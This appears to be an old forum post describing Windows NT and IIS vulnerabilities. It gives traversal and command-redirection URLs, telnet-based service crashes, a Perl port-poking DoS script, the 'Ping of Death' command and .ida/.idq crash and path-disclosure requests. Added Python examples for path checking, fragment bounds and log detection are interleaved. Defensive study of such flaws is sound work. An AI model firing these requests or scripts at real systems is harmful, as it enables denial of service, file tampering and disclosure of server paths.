Title: NT vulnerabilities and descriptions (English)
Author: 雜七雜八    Time: 2011-1-13 17:12

Affected systems: 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the web server content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
--------------------------------------------------------------------
Affected systems: 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' already exists, it will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat' (%0A%0D decodes to a line-feed/carriage-return pair, so the script name is terminated before the redirection is handed to the command interpreter).
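The three request shapes above (the '..\..' traversal, the 'scripts..\..' variant, and the '>' / %0A%0D forms that reach the command interpreter) all fail the same canonicalisation check. The following is an added Python example, not code from the original post or from IIS: it is the path check a request handler should perform before touching the file system. The content root /inetpub/wwwroot is an assumption, and the rejection of segments with trailing dots relies on the Win32 rule that trailing dots and spaces are stripped from a file name, which is what lets 'scripts..' open the 'scripts' directory.

```python
import posixpath
from urllib.parse import unquote

CONTENT_ROOT = "/inetpub/wwwroot"    # assumed content root for this example
SHELL_META = set("<>|&")             # cmd.exe redirection and chaining characters


def canonical_request_path(raw_path):
    """Map a request path to an absolute path under CONTENT_ROOT.

    Returns the normalised path, or None when the request escapes the root
    or carries characters that must never reach a file name or command line.
    """
    # 1. Percent-decode. A second pass catches double-encoded dots; anything
    #    still encoded after that is refused rather than guessed at.
    path = unquote(raw_path)
    if "%" in path:
        path = unquote(path)
        if "%" in path:
            return None
    # 2. The query string is never part of the file-system path.
    path = path.split("?", 1)[0]
    # 3. Refuse control characters (the %0A%0D trick appends CR/LF to the
    #    command line built for a .bat handler) and cmd.exe metacharacters
    #    (the '>' that redirects output into PATH\target.bat).
    if any(ord(c) < 0x20 or c == "\x7f" or c in SHELL_META for c in path):
        return None
    # 4. NT accepts '\' as a separator, so fold it before normalising;
    #    otherwise '..\..' is one opaque segment to posixpath and survives.
    path = path.replace("\\", "/")
    # 5. Drive letters, UNC prefixes and empty segments would re-root the path.
    if ":" in path or "//" in path:
        return None
    # 6. Win32 strips trailing dots and spaces from a name, so 'scripts..'
    #    opens 'scripts'. Refuse such segments instead of reproducing that.
    for seg in path.strip("/").split("/"):
        if seg not in (".", "..") and seg != seg.rstrip(". "):
            return None
    # 7. Collapse '.' and '..' lexically under the root, then require that
    #    the result is the root itself or strictly below it.
    full = posixpath.normpath(CONTENT_ROOT + "/" + path.strip("/"))
    if full != CONTENT_ROOT and not full.startswith(CONTENT_ROOT + "/"):
        return None
    return full


if __name__ == "__main__":
    # Constructed request paths: the ones from the advisory plus two benign ones.
    for p in ["/..\\..", "/scripts..\\..\\scriptname",
              "/scripts/script_name%0A%0D", "/scripts/exploit.bat%3Ec:%5ctarget.bat",
              "/docs/../index.htm", "/scripts/test.bat?x=1"]:
        print(f"{p!r:45} -> {canonical_request_path(p)}")
```

Note that the containment test in step 7 is done after the root is prepended: normalising '../..' on its own collapses to '/' and would look harmless, whereas '/inetpub/wwwroot/../..' visibly leaves the root.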
----------------------------------------------------------------------
Affected systems: 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

    Telnet to an NT 4.0 system on port 135
    Type about 10 characters followed by a <CR>
    Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple confused services can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more process time than usual. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings on the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT Resource Kit):
    use Socket;
    use FileHandle;
    require "chat2.pl";      # Perl 4 era socket library shipped with old Perl distributions

    $systemname = shift @ARGV or die "usage: perl poke servername\n";

    $verbose = 1;            # tell me what you're hitting
    $knownports = 1;         # don't hit known problem ports (53, 135, 1031)

    # The original read '$port = $0', which is the program name, not zero.
    for ($port = 0; $port < 65535; $port++) {
        if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
            next;
        }
        $fh = chat::open_port($systemname, $port);
        next unless $fh;     # open_port returns false when nothing is listening
        chat::print($fh, "This is about ten characters or more");
        if ($verbose) {
            print "Trying port: $port\n";
        }
        chat::close($fh);
    }

    # end poke code
Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername
--------------------------------------------------------------------------------
Affected systems: 4.0

Using a telnet application to connect to a web server on HTTP port 80 and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and log an error:

"The application, exe\inetinfo.dbg, generated an application error. The error occurred on date @ time. The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT)"

(Exception code c0000005 is STATUS_ACCESS_VIOLATION.)

--------------------------------------------------------------------------------
Affected systems: 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

    STOP: 0x0000001E
    KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

    -OR-

    STOP: 0x0000000A
    IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving them.
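Why -l 65527 is the interesting number, and the bound a fragment reassembler has to enforce, as an added Python example (not code from the original post, and not the TCPIP.SYS logic). It assumes a 1500-byte link MTU and a 20-byte IPv4 header without options; the 8-byte ICMP echo header and the 16-bit IPv4 total-length field are fixed by the protocols. The datagram is split exactly as a sender would, then each fragment's end offset is checked against 65535 before it is accepted.

```python
MAX_DATAGRAM = 65535   # IPv4 total length is a 16-bit field
IP_HEADER = 20         # IPv4 header without options (assumed)
ICMP_HEADER = 8        # ICMP echo header
MTU = 1500             # assumed Ethernet-sized link MTU


def fragment(data_len, mtu=MTU):
    """Split data_len bytes of IP payload into fragments as a sender would.

    Each fragment is (offset in 8-byte units, more-fragments flag, payload
    length); every fragment except the last carries a multiple of 8 bytes.
    """
    per_frag = (mtu - IP_HEADER) // 8 * 8
    frags, offset = [], 0
    while offset < data_len:
        length = min(per_frag, data_len - offset)
        mf = 1 if offset + length < data_len else 0
        frags.append((offset // 8, mf, length))
        offset += length
    return frags


def reassemble_length(frags):
    """Return the reassembled datagram length, or raise ValueError if any
    fragment would land beyond the 65535-byte maximum.

    This is the check a vulnerable reassembler skipped: without it the last
    fragment of an oversized ping is copied past the end of the buffer that
    was sized for a maximum-length datagram.
    """
    end = 0
    for offset_units, _mf, length in frags:
        if offset_units > 0x1FFF:          # fragment offset is a 13-bit field
            raise ValueError("fragment offset does not fit in the header")
        stop = IP_HEADER + offset_units * 8 + length
        if stop > MAX_DATAGRAM:
            raise ValueError(
                f"fragment at byte {offset_units * 8} ends at {stop}, "
                f"beyond the {MAX_DATAGRAM}-byte maximum datagram")
        end = max(end, stop)
    return end


def ping_is_accepted(echo_payload_len):
    """True if an echo request with this many data bytes (the -l value)
    reassembles within bounds, False if the reassembler must drop it."""
    try:
        reassemble_length(fragment(ICMP_HEADER + echo_payload_len))
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for l in (32, 65507, 65527):
        frags = fragment(ICMP_HEADER + l)
        print(f"ping -l {l}: {len(frags)} fragments, accepted={ping_is_accepted(l)}")
```

With -l 65507 the ICMP message plus IP header is exactly 65535 bytes and passes; with -l 65527 the last of the 45 fragments ends at byte 65555, twenty bytes past the largest datagram the header can describe.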
--------------------------------------------------------------------------------
Microsoft IIS 5.0 has problems handling a specific form of URL ending in "ida". The problem can have two kinds of result. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other is that the server terminates with an "Access Violation" message (effectively a denial of service against the server). All IIS versions up to and including IIS 5.0 are vulnerable. When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------
IIS, Microsoft's Internet Information Server, can be made to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ or IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response like 'The IDQ d:\http\anything.idq could not be found'. Such a response lets him learn more about how the web site is organized and the directory structure of the server.
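The two .ida/.idq items above, the long-dot crash request and the path-disclosure probe, leave a distinctive trace in the IIS W3C extended log, as do the earlier traversal and '>' redirection requests. Here is an added Python example (not code from the original post) that parses such a log by its #Fields header and flags those request shapes. The log lines are constructed for the example, with a 300-dot run standing in for the roughly 25 KB of dots in the crash request; the status codes and client addresses are made up.

```python
import re
from urllib.parse import unquote

DOTS = "." * 300   # stands in for the ~25 KB run of dots in the .ida DoS request

# Constructed W3C extended log excerpt (not from the original post). The
# #Fields line names the columns, so the parser follows whatever order a
# real log uses.
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2001-06-18 10:01:02 192.0.2.10 GET /default.htm - 200",
    "2001-06-18 10:01:05 192.0.2.44 GET /anything.ida - 404",
    "2001-06-18 10:01:06 192.0.2.44 GET /anything.idq - 404",
    f"2001-06-18 10:01:09 192.0.2.44 GET /{DOTS}ida - 500",
    "2001-06-18 10:02:11 192.0.2.77 GET /scripts/..%5c..%5cwinnt/win.ini - 200",
    "2001-06-18 10:02:15 192.0.2.77 GET /scripts/exploit.bat%3Ec:%5cinetpub%5ctarget.bat - 502",
])

TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")   # '..' between separators
SHELL_META = set("<>|&")                            # cmd.exe redirection/chaining


def parse_w3c(text):
    """Yield one dict per record, keyed by the column names in #Fields."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields is None or len(values) != len(fields):
            continue   # malformed record; a real pipeline would count these
        yield dict(zip(fields, values))


def classify(rec):
    """Return the list of findings for one record (empty if nothing matched)."""
    stem = unquote(rec.get("cs-uri-stem", ""))   # decode so %5c and %3E are seen
    lower = stem.lower()
    status = rec.get("sc-status", "")
    findings = []
    # A failed .ida/.idq request: the error page carries the physical path.
    if lower.endswith((".ida", ".idq")) and status in ("404", "500"):
        findings.append("ida/idq path-disclosure probe")
    # A long run of dots ending in 'ida': the crash/DoS request form.
    if lower.endswith("ida") and "." * 100 in lower:
        findings.append("long-dot .ida request (DoS)")
    # '..' between separators, with '\' accepted as NT does.
    if TRAVERSAL.search(stem):
        findings.append("directory traversal")
    # '>' redirection into a .bat target, or CR/LF smuggled into a script name.
    if any(c in SHELL_META or ord(c) < 0x20 for c in stem):
        findings.append("shell metacharacter or control character in URL")
    return findings


def scan(log_text):
    """Run classify over every record and return the flagged ones in order."""
    hits = []
    for rec in parse_w3c(log_text):
        findings = classify(rec)
        if findings:
            hits.append({"ip": rec["c-ip"], "stem": rec["cs-uri-stem"][:60],
                         "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["stem"], hit["findings"])
```

Decoding the stem before matching matters: the traversal and redirection requests are logged percent-encoded, and a pattern applied to the raw field would miss them.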